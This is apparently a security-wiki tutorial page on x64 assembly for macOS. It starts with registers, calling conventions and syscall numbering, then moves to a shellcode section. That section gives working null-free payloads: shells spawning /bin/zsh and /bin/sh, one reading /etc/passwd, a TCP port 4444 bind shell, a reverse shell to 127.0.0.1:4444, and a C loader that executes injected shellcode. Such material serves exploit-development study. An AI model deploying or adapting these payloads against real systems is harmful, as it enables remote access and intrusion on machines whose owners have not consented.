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Introduction to x64 โ€‹

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Introduction to x64 โ€‹

x64, also known as x86-64, is a 64-bit processor architecture predominantly used in desktop and server computing. Originating from the x86 architecture produced by Intel and later adopted by AMD with the name AMD64, it's the prevalent architecture in personal computers and servers today.

Registers โ€‹

x64 expands upon the x86 architecture, featuring 16 general-purpose registers labeled rax, rbx, rcx, rdx, rbp, rsp, rsi, rdi, and r8 through r15. Each of these can store a 64-bit (8-byte) value. These registers also have 32-bit, 16-bit, and 8-bit sub-registers for compatibility and specific tasks.

  1. rax - Traditionally used for return values from functions.
  2. rbx - Often used as a base register for memory operations.
  3. rcx - Commonly used for loop counters.
  4. rdx - Used in various roles including extended arithmetic operations.
  5. rbp - Base pointer for the stack frame.
  6. rsp - Stack pointer, keeping track of the top of the stack.
  7. rsi and rdi - Used for source and destination indexes in string/memory operations.
  8. r8 to r15 - Additional general-purpose registers introduced in x64.

Calling Convention โ€‹

The x64 calling convention varies between operating systems. For instance:

  • Windows: The first four parameters are passed in the registers rcx, rdx, r8, and r9. Further parameters are pushed onto the stack. The return value is in rax.
  • System V (commonly used in UNIX-like systems): The first six integer or pointer parameters are passed in registers rdi, rsi, rdx, rcx, r8, and r9. The return value is also in rax.

If the function has more than six inputs, the rest will be passed on the stack. RSP, the stack pointer, has to be 16 bytes aligned, which means that the address it points to must be divisible by 16 before any call happens. This means that normally we would need to ensure that RSP is properly aligned in our shellcode before we make a function call. However, in practice, system calls work many times even if this requirement is not met.

Calling Convention in Swift โ€‹

Swift have its own calling convention that can be found in https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#x86-64

Common Instructions โ€‹

x64 instructions have a rich set, maintaining compatibility with earlier x86 instructions and introducing new ones.

  • mov: Move a value from one register or memory location to another.
    • Example: mov rax, rbx โ€” Moves the value from rbx to rax.
  • push and pop: Push or pop values to/from the stack.
    • Example: push rax โ€” Pushes the value in rax onto the stack.
    • Example: pop rax โ€” Pops the top value from the stack into rax.
  • add and sub: Addition and subtraction operations.
    • Example: add rax, rcx โ€” Adds the values in rax and rcx storing the result in rax.
  • mul and div: Multiplication and division operations. Note: these have specific behaviors regarding operand usage.
  • call and ret: Used to call and return from functions.
  • int: Used to trigger a software interrupt. E.g., int 0x80 was used for system calls in 32-bit x86 Linux.
  • cmp: Compare two values and set the CPU's flags based on the result.
    • Example: cmp rax, rdx โ€” Compares rax to rdx.
  • je, jne, jl, jge, ...: Conditional jump instructions that change control flow based on the results of a previous cmp or test.
    • Example: After a cmp rax, rdx instruction, je label โ€” Jumps to label if rax is equal to rdx.
  • syscall: Used for system calls in some x64 systems (like modern Unix).
  • sysenter: An optimized system call instruction on some platforms.

Function Prologue โ€‹

  1. Push the old base pointer: push rbp (saves the caller's base pointer)
  2. Move the current stack pointer to the base pointer: mov rbp, rsp (sets up the new base pointer for the current function)
  3. Allocate space on the stack for local variables: sub rsp, <size> (where <size> is the number of bytes needed)

Function Epilogue โ€‹

  1. Move the current base pointer to the stack pointer: mov rsp, rbp (deallocate local variables)
  2. Pop the old base pointer off the stack: pop rbp (restores the caller's base pointer)
  3. Return: ret (returns control to the caller)

macOS โ€‹

syscalls โ€‹

There are different classes of syscalls, you can find them here:

c
#define SYSCALL_CLASS_NONE	0	/* Invalid */
#define SYSCALL_CLASS_MACH	1	/* Mach */	
#define SYSCALL_CLASS_UNIX	2	/* Unix/BSD */
#define SYSCALL_CLASS_MDEP	3	/* Machine-dependent */
#define SYSCALL_CLASS_DIAG	4	/* Diagnostics */
#define SYSCALL_CLASS_IPC	5	/* Mach IPC */

Then, you can find each syscall number in this url:

c
0	AUE_NULL	ALL	{ int nosys(void); }   { indirect syscall }
1	AUE_EXIT	ALL	{ void exit(int rval); } 
2	AUE_FORK	ALL	{ int fork(void); } 
3	AUE_NULL	ALL	{ user_ssize_t read(int fd, user_addr_t cbuf, user_size_t nbyte); } 
4	AUE_NULL	ALL	{ user_ssize_t write(int fd, user_addr_t cbuf, user_size_t nbyte); } 
5	AUE_OPEN_RWTC	ALL	{ int open(user_addr_t path, int flags, int mode); } 
6	AUE_CLOSE	ALL	{ int close(int fd); } 
7	AUE_WAIT4	ALL	{ int wait4(int pid, user_addr_t status, int options, user_addr_t rusage); } 
8	AUE_NULL	ALL	{ int nosys(void); }   { old creat }
9	AUE_LINK	ALL	{ int link(user_addr_t path, user_addr_t link); } 
10	AUE_UNLINK	ALL	{ int unlink(user_addr_t path); } 
11	AUE_NULL	ALL	{ int nosys(void); }   { old execv }
12	AUE_CHDIR	ALL	{ int chdir(user_addr_t path); } 
[...]

So in order to call the open syscall (5) from the Unix/BSD class you need to add it: 0x2000000

So, the syscall number to call open would be 0x2000005

Shellcodes โ€‹

To compile:

bash
nasm -f macho64 shell.asm -o shell.o
ld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib

To extract the bytes:

bash
# Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/b729f716aaf24cbc8109e0d94681ccb84c0b0c9e/helper/extract.sh
for c in $(objdump -d "shell.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ; do
    echo -n '\\x'$c
done

# Another option
otool -t shell.o | grep 00 | cut -f2 -d$'\t' | sed 's/ /\\x/g' | sed 's/^/\\x/g' | sed 's/\\x$//g'
C code to test the shellcode
c
// code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/loader.c
// gcc loader.c -o loader
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>

int (*sc)();

char shellcode[] = "<INSERT SHELLCODE HERE>";

int main(int argc, char **argv) {
    printf("[>] Shellcode Length: %zd Bytes\n", strlen(shellcode));
 
    void *ptr = mmap(0, 0x1000, PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0);
 
    if (ptr == MAP_FAILED) {
        perror("mmap");
        exit(-1);
    }
    printf("[+] SUCCESS: mmap\n");
    printf("    |-> Return = %p\n", ptr);
 
    void *dst = memcpy(ptr, shellcode, sizeof(shellcode));
    printf("[+] SUCCESS: memcpy\n");
    printf("    |-> Return = %p\n", dst);

    int status = mprotect(ptr, 0x1000, PROT_EXEC | PROT_READ);

    if (status == -1) {
        perror("mprotect");
        exit(-1);
    }
    printf("[+] SUCCESS: mprotect\n");
    printf("    |-> Return = %d\n", status);

    printf("[>] Trying to execute shellcode...\n");

    sc = ptr;
    sc();
 
    return 0;
}

Shell โ€‹

Taken from here and explained.

armasm
bits 64
global _main
_main:
    call    r_cmd64
    db '/bin/zsh', 0
r_cmd64:                      ; the call placed a pointer to db (argv[2])
    pop     rdi               ; arg1 from the stack placed by the call to l_cmd64
    xor     rdx, rdx          ; store null arg3
    push    59                ; put 59 on the stack (execve syscall)
    pop     rax               ; pop it to RAX
    bts     rax, 25           ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
    syscall
armasm
bits 64
global _main

_main:
    xor     rdx, rdx          ; zero our RDX
    push    rdx               ; push NULL string terminator
    mov     rbx, '/bin/zsh'   ; move the path into RBX
    push    rbx               ; push the path, to the stack
    mov     rdi, rsp          ; store the stack pointer in RDI (arg1)
    push    59                ; put 59 on the stack (execve syscall)
    pop     rax               ; pop it to RAX
    bts     rax, 25           ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
    syscall

Read with cat โ€‹

The goal is to execute execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL), so the second argument (x1) is an array of params (which in memory these means a stack of the addresses).

armasm
bits 64
section .text
global _main

_main:
    ; Prepare the arguments for the execve syscall
    sub rsp, 40         ; Allocate space on the stack similar to `sub sp, sp, #48`

    lea rdi, [rel cat_path]   ; rdi will hold the address of "/bin/cat"
    lea rsi, [rel passwd_path] ; rsi will hold the address of "/etc/passwd"
    
    ; Create inside the stack the array of args: ["/bin/cat", "/etc/passwd"]
    push rsi   ; Add "/etc/passwd" to the stack (arg0)
    push rdi   ; Add "/bin/cat" to the stack (arg1)
    
    ; Set in the 2nd argument of exec the addr of the array
    mov rsi, rsp    ; argv=rsp - store RSP's value in RSI

    xor rdx, rdx    ; Clear rdx to hold NULL (no environment variables)
    
    push    59      ; put 59 on the stack (execve syscall)
    pop     rax     ; pop it to RAX
    bts     rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
    syscall         ; Make the syscall

section .data
cat_path:      db "/bin/cat", 0
passwd_path:   db "/etc/passwd", 0

Invoke command with sh โ€‹

armasm
bits 64
section .text
global _main

_main:
    ; Prepare the arguments for the execve syscall
    sub rsp, 32           ; Create space on the stack

    ; Argument array
    lea rdi, [rel touch_command]        
    push rdi                      ; push &"touch /tmp/lalala"   
    lea rdi, [rel sh_c_option]    
    push rdi                      ; push &"-c"
    lea rdi, [rel sh_path]
    push rdi                      ; push &"/bin/sh"   

    ; execve syscall
    mov rsi, rsp                  ; rsi = pointer to argument array
    xor rdx, rdx                  ; rdx = NULL (no env variables)
    push    59                    ; put 59 on the stack (execve syscall)
    pop     rax                   ; pop it to RAX
    bts     rax, 25               ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
    syscall

_exit:
    xor rdi, rdi                  ; Exit status code 0
    push    1                     ; put 1 on the stack (exit syscall)
    pop     rax                   ; pop it to RAX
    bts     rax, 25               ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
    syscall

section .data
sh_path:        db "/bin/sh", 0
sh_c_option:    db "-c", 0
touch_command:  db "touch /tmp/lalala", 0

Bind shell โ€‹

Bind shell from https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html in port 4444

armasm
section .text
global _main
_main:
    ; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP)
    xor  rdi, rdi
    mul  rdi
    mov  dil, 0x2
    xor  rsi, rsi
    mov  sil, 0x1
    mov  al, 0x2
    ror  rax, 0x28
    mov  r8, rax
    mov  al, 0x61
    syscall

    ; struct sockaddr_in {
    ;         __uint8_t       sin_len;
    ;         sa_family_t     sin_family;
    ;         in_port_t       sin_port;
    ;         struct  in_addr sin_addr;
    ;         char            sin_zero[8];
    ; };
    mov  rsi, 0xffffffffa3eefdf0
    neg  rsi
    push rsi
    push rsp
    pop  rsi

    ; bind(host_sockid, &sockaddr, 16)
    mov  rdi, rax
    xor  dl, 0x10
    mov  rax, r8
    mov  al, 0x68
    syscall    

    ; listen(host_sockid, 2)
    xor  rsi, rsi
    mov  sil, 0x2
    mov  rax, r8
    mov  al, 0x6a
    syscall

    ; accept(host_sockid, 0, 0)
    xor  rsi, rsi
    xor  rdx, rdx
    mov  rax, r8
    mov  al, 0x1e
    syscall

    mov rdi, rax
    mov sil, 0x3

dup2:
    ; dup2(client_sockid, 2)
    ;   -> dup2(client_sockid, 1)
    ;   -> dup2(client_sockid, 0)
    mov  rax, r8
    mov  al, 0x5a
    sub  sil, 1
    syscall
    test rsi, rsi
    jne  dup2

    ; execve("//bin/sh", 0, 0)
    push rsi
    mov  rdi, 0x68732f6e69622f2f
    push rdi
    push rsp
    pop  rdi
    mov  rax, r8
    mov  al, 0x3b
    syscall

Reverse Shell โ€‹

Reverse shell from https://packetstormsecurity.com/files/151727/macOS-127.0.0.1-4444-Reverse-Shell-Shellcode.html. Reverse shell to 127.0.0.1:4444

armasm
section .text
global _main
_main:
    ; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP)
    xor  rdi, rdi
    mul  rdi
    mov  dil, 0x2
    xor  rsi, rsi
    mov  sil, 0x1
    mov  al, 0x2
    ror  rax, 0x28
    mov  r8, rax
    mov  al, 0x61
    syscall

    ; struct sockaddr_in {
    ;         __uint8_t       sin_len;
    ;         sa_family_t     sin_family;
    ;         in_port_t       sin_port;
    ;         struct  in_addr sin_addr;
    ;         char            sin_zero[8];
    ; };
    mov  rsi, 0xfeffff80a3eefdf0
    neg  rsi
    push rsi
    push rsp
    pop  rsi

    ; connect(sockid, &sockaddr, 16)
    mov  rdi, rax
    xor  dl, 0x10
    mov  rax, r8
    mov  al, 0x62
    syscall    

    xor rsi, rsi
    mov sil, 0x3

dup2:
    ; dup2(sockid, 2)
    ;   -> dup2(sockid, 1)
    ;   -> dup2(sockid, 0)
    mov  rax, r8
    mov  al, 0x5a
    sub  sil, 1
    syscall
    test rsi, rsi
    jne  dup2

    ; execve("//bin/sh", 0, 0)
    push rsi
    mov  rdi, 0x68732f6e69622f2f
    push rdi
    push rsp
    pop  rdi
    xor  rdx, rdx
    mov  rax, r8
    mov  al, 0x3b
    syscall
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